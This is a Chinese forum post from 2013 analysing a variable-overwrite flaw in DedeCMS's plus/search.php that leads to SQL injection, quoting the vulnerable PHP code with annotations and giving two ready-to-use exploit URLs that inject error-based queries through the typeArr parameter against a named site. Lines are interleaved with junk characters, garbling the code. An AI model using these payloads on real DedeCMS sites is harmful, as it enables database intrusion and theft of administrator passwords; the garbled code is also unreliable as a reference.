微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.9 V& A$ \5 X1 ]! O P
作者: c4rp3nt3r@0x50sec.org
8 n6 H- |1 I; o) x4 G7 TDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
" u! M. C, T+ A: I# n( A. @ * V# ]& D; Q, p' B0 F9 Y
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.0 q4 g) J' V& }, g% f% v! p
/ F0 s4 j& e' y7 Z2 \============
7 I" |4 @% C) h , c6 f- N, q+ @ u$ G
: t& U0 |( k+ o& g$ m$ C% K9 T
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
+ i' S# }9 y' f8 _- S5 J( }0 e$ I( P 9 E% R+ \- F% r) g. \8 T% s
require_once(dirname(__FILE__).”/../include/common.inc.php”);' ]9 l& \9 j( b. [& y3 d
require_once(DEDEINC.”/arc.searchview.class.php”);
6 l) b) T6 S3 u _7 n5 w
) C8 ?- V6 ?7 m" r$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10; F4 Z; Q& U$ l
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
5 {6 R: u' p# ]: n! F S8 T2 ^, @) E$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
6 E' H/ n* Z; ]# `0 n: N$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
: Y9 n. X- F# m: a$ M3 k: s- q$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;# w W! ~& H" k5 C
2 V4 p$ x$ h; }! H Yif(!isset($orderby)) $orderby=”;6 X* ~, c/ ]* I, D
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);6 o6 i' d2 o( G
2 j) Q* E, N" ]) K- H# ]% @
* a7 B( u# @* M. \$ D
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
2 @* }. i9 v4 J! qelse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
! U$ a7 s, A9 Z; ?$ O* \9 f
* V: O' l0 S& j! e' j0 p: Uif(!isset($keyword)){
; V9 |% j& H# I' O0 D if(!isset($q)) $q = ”;2 K4 M- N. I3 o' o# p6 }
$keyword=$q;# I) j4 g6 w8 U$ ^( P& A% n4 m
}0 y7 M, r% u0 C
& P/ v1 D0 _4 f( w
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));7 k7 a, Y! U* a( m
5 `3 `( N' F; U; t) Q0 W+ V# n) O
//查找栏目信息
: c) A6 }3 {. j2 y. _if(empty($typeid))
6 H" k2 d; f# a. B4 j6 f{4 ]/ D- b( z# c9 u! p
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;' ?9 N) z! L/ z$ f0 ?
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
- ]. ~, g: }2 t6 u6 B1 s) E {2 y: h& ]6 p4 d- e/ e5 J2 x
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
+ T6 H# {# M: J( B! ^; [1 h( O fwrite($fp, “<”.”?php\r\n”);
. p a8 ~1 Z) ?' x& } $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);% e8 |9 {( _+ ~! W$ j4 f! h
$dsql->Execute();
0 O. d+ Z* V3 o: i( R- c1 m% z6 f while($row = $dsql->GetArray())
0 R I) e7 S7 n1 ]# z! i: u2 R {
; U# {' a* y+ _ fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);. x) w+ ?" P+ \' C! H0 q( j
}+ z2 `& \8 w. j, Y$ Z' r
fwrite($fp, ‘?’.'>’);
0 @- G+ y7 f+ [+ i* J, w; M# P fclose($fp);
: I B4 u. g, J6 ~ }. U$ g& }$ V" @' y
//引入栏目缓存并看关键字是否有相关栏目内容
6 B* c# d& P1 r4 e" @7 ~ require_once($typenameCacheFile);2 R, z. T# z; g. g- J! | l
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
a. K6 P" q' T; v* G//. ?2 N! o! ~1 ?6 T% H
if(isset($typeArr) && is_array($typeArr))4 j5 N0 `! P& i/ S5 S
{
6 g$ E9 t% @/ E' p foreach($typeArr as $id=>$typename)
8 k' `6 p0 _0 O {6 @- m) y( d1 n8 p) o
$ E- P8 a2 z0 z. _0 F$ w <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过5 Z& P+ H7 A3 ^
if($keyword != $keywordn)! L: z) Z; b! ~& V
{+ C; p! F1 U' X: _; i* |( ^! h& f: M
$keyword = $keywordn;' `+ e" ~: K- j9 `; r
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
( y1 m& Z" H- Y1 |3 L break;
5 m1 s8 U& h8 ?3 m8 W( M: F3 X }
1 `, R: t" Y, Y7 S }7 y6 Z# ^# w( x* F3 V. Z' n
}2 M$ z1 k9 x: J9 T0 K
}
; [. `; Z8 n7 F4 x) x2 t; N然后plus/search.php文件下面定义了一个 Search类的对象 .9 e o" [8 b. y
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.4 W& z, R& p! D: M7 c( M
$this->TypeLink = new TypeLink($typeid);
$ ^3 I* K3 L7 g- a0 h% D) k( g # a& G% z( N3 {% V* l
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
! x9 t! [2 ]% e% ]" N: }: W 5 N7 ~' L( O* p' c& P" Z9 x
class TypeLink7 I2 ^$ k1 W, z4 E0 v) X: m" R
{
! q: O$ X$ u6 S- r8 h+ @+ C var $typeDir;% _9 A7 a# { w6 n8 p, s& W
var $dsql;3 ~8 m) t. @" [/ }, c: j" a
var $TypeID;" D; z3 h# N; v3 k$ m4 g
var $baseDir;* j7 z, Q& ?7 y- \/ u$ G- P/ _
var $modDir;
! ^% ~; T7 |* o var $indexUrl; L# p! k, W# J b9 \
var $indexName;$ J2 a) k% Q, f, I( v
var $TypeInfos;& B+ S* w" M, r |/ }5 X% c
var $SplitSymbol;& f+ a2 }8 G' A2 M, d/ E7 `$ O+ {
var $valuePosition;
/ ^8 b. Q% N# w# D7 L var $valuePositionName;
$ S( z4 Q: y. k/ ^ var $OptionArrayList;//构造函数///////
6 i% j7 w6 s; Z& u9 p //php5构造函数
% L$ N% a ~- Y+ w N/ f" n$ j5 E7 o function __construct($typeid)6 K" I |6 Q: ]' C& l
{' [9 C$ `4 I2 d U
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
8 s& A& B- q, c8 d3 s0 E $this->indexName = $GLOBALS['cfg_indexname'];5 `8 m3 X) K1 Q+ ?
$this->baseDir = $GLOBALS['cfg_basedir'];: [4 Z. Q' A4 C) a, n
$this->modDir = $GLOBALS['cfg_templets_dir'];
4 `' M+ C8 b- x+ A! m9 c $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
; F d8 t3 m( [3 ?# k5 Y0 B $this->dsql = $GLOBALS['dsql'];
6 T- o8 @3 [% x $this->TypeID = $typeid;* @" a8 Y: O2 ^5 y
$this->valuePosition = ”;( J* S% o! y/ r F# }% s
$this->valuePositionName = ”;
& }4 k8 U2 Y& k }$ E7 r $this->typeDir = ”;
! `6 b' W1 w b& x1 w3 k- y) j $this->OptionArrayList = ”;
/ E; E1 \! G; x3 u w2 @* _ ) [: ^6 G! `3 @- y0 X
//载入类目信息( q3 X8 F7 f7 Z6 h
' X8 r" k( q+ Y5 E( A <font color=”Red”>$query = “SELECT tp.*,ch.typename as1 E, v ^. P ?4 t
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join. f) B5 N( v2 U1 U& P. a
`#@__channeltype` ch3 E2 ] s6 |5 R; n9 z
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿. f6 L$ n' Y" Y+ Z U' `. i; J6 {
" l5 x0 e7 T$ H! ^, u if($typeid > 0)0 z% T, A1 h- X9 O! C, Q, P
{4 v5 G$ A: |4 h2 O+ E9 s0 T6 V2 R
$this->TypeInfos = $this->dsql->GetOne($query);
) k# Z, g- V6 p H+ X2 v" @# j8 s利用代码一 需要 即使magic_quotes_gpc = Off4 R8 Z( e; l) h5 m8 X9 n* R
; i3 A7 U6 a% ~- x- x, i
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
$ T6 ?. _& k- K- r
4 j Y X- n3 |% i这只是其中一个利用代码… Search 类的构造函数再往下
8 G! e- q. v0 L2 f- S$ T1 C! [% a/ j
& F- M# n) ^5 _ D& P/ m4 D……省略/ M' g6 h6 L; R
$this->TypeID = $typeid;
8 `: o6 \/ W/ J……省略
$ Z( \ S/ k1 O7 U9 Pif($this->TypeID==”0″){) D' f8 M( U) K% ~/ u8 b
$this->ChannelTypeid=1;
" w! n3 _$ j% o8 q8 P }else{, D# `. T# }0 g; w. b
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
9 F) I$ q- Z* n9 @5 x//现在不鸡肋了吧亲…& ~+ n9 X$ m" M9 s# K
$this->ChannelTypeid=$row['channeltype'];+ O9 |& I; `6 P* Y, z" E2 T
. Y0 q7 t) r9 d2 ~% N1 u( k L5 I }
; |# Q7 ]; `) V, N. L: s6 f利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
4 z1 k' S# C8 `; |& l ' x9 A+ q1 l2 I t: [8 A
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
" y ~: y9 M$ D' D7 G 0 y/ D5 L- {; H! ] R
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
6 y1 t6 m; i: T$ S& g1 m |
发表于 2013-1-19 08:18:56
收藏
分享
支持
反对